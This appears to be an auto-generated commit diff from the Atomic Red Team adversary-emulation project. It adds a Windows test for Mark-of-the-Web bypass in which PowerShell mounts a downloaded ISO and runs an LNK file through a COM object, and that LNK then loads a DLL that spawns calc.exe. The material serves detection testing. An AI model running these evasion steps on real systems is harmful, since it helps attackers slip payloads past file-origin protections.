Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -250,6 +250,7 @@ defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -184,6 +184,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -359,6 +359,7 @@
   - Atomic Test #1: Mount ISO image [windows]
   - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
   - Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
+  - Atomic Test #4: Execute LNK file from ISO [windows]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -269,6 +269,7 @@
   - Atomic Test #1: Mount ISO image [windows]
   - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
   - Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
+  - Atomic Test #4: Execute LNK file from ISO [windows]
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -14277,6 +14277,41 @@ defense-evasion:
         cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value
           ''[ZoneTransfer]'',''ZoneId=3''
 
+          '
+        name: powershell
+    - name: Execute LNK file from ISO
+      auto_generated_guid: c2587b8d-743d-4985-aa50-c83394eaeb68
+      description: 'Executes LNK file document.lnk from AllTheThings.iso. Link file
+        executes cmd.exe and rundll32 to in order to load and execute AllTheThingsx64.dll
+        from the ISO which spawns calc.exe.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: Path
+          default: PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AllTheThings.iso must exist on disk at specified location (#{path_of_iso})
+
+          '
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: |
+          $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          $driveLetter = ($keep | Get-Volume).DriveLetter
+          $instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
+          $instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)
+        cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+
           '
         name: powershell
   T1600.002:

atomics/T1553.005/T1553.005.md

@@ -12,6 +12,8 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
 
 - [Atomic Test #3 - Remove the Zone.Identifier alternate data stream](#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream)
 
+- [Atomic Test #4 - Execute LNK file from ISO](#atomic-test-4---execute-lnk-file-from-iso)
+
 
 <br/>
 
@@ -169,4 +171,57 @@ Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Execute LNK file from ISO
+Executes LNK file document.lnk from AllTheThings.iso. Link file executes cmd.exe and rundll32 to in order to load and execute AllTheThingsx64.dll from the ISO which spawns calc.exe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c2587b8d-743d-4985-aa50-c83394eaeb68
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | Path | PathToAtomicsFolder&#92;T1553.005&#92;bin&#92;AllTheThings.iso|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+$driveLetter = ($keep | Get-Volume).DriveLetter
+$instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
+$instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AllTheThings.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
 <br/>